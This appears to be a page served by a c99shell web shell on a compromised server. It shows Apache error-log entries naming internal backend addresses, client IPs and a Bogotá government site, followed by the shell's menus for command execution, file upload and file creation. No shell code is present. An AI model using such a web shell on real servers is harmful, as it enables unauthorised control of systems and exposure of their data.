[Mon Jun 20 21:13:55.172255 2016] [proxy_http:error] [pid 15364:tid 14184] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:20758] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 21:13:55.172255 2016] [proxy:error] [pid 15364:tid 16160] [client 201.245.192.253:20757] AH00898: Error reading from remote server returned by /IsolucionSDA/Menu.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 21:13:55.172255 2016] [proxy:error] [pid 15364:tid 14184] [client 201.245.192.253:20758] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 21:41:55.295206 2016] [proxy_http:error] [pid 15364:tid 14828] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22099] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 21:41:55.295206 2016] [proxy:error] [pid 15364:tid 14828] [client 201.245.192.253:22099] AH00898: Error reading from remote server returned by /IsolucionSDA/Menu.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 21:41:55.310806 2016] [proxy_http:error] [pid 15364:tid 14320] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22100] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 21:41:55.310806 2016] [proxy:error] [pid 15364:tid 14320] [client 201.245.192.253:22100] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=5
[Mon Jun 20 22:05:45.895719 2016] [access_compat:error] [pid 15364:tid 14320] [client 190.7.146.126:57504] AH01797: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Mon Jun 20 22:53:04.493304 2016] [proxy:error] [pid 15364:tid 14000] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 20 22:53:04.493304 2016] [proxy:error] [pid 15364:tid 14000] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 20 22:53:04.493304 2016] [proxy_http:error] [pid 15364:tid 14000] [client 186.77.203.200:17577] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jun 20 22:53:07.847310 2016] [proxy:error] [pid 15364:tid 16372] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jun 20 23:11:57.337094 2016] [core:error] [pid 15364:tid 14156] (20024)The given path is misformatted or contained invalid characters: [client 1.237.177.12:24579] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file, referer: http://ambientebogota.gov.co
[Mon Jun 20 23:56:46.065217 2016] [proxy:error] [pid 15364:tid 13548] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jun 20 23:56:46.065217 2016] [proxy:error] [pid 15364:tid 13548] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jun 20 23:56:46.065217 2016] [proxy_http:error] [pid 15364:tid 13548] [client 66.249.64.198:42565] AH01114: HTTP: failed to make connection to backend: 172.22.1.51

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--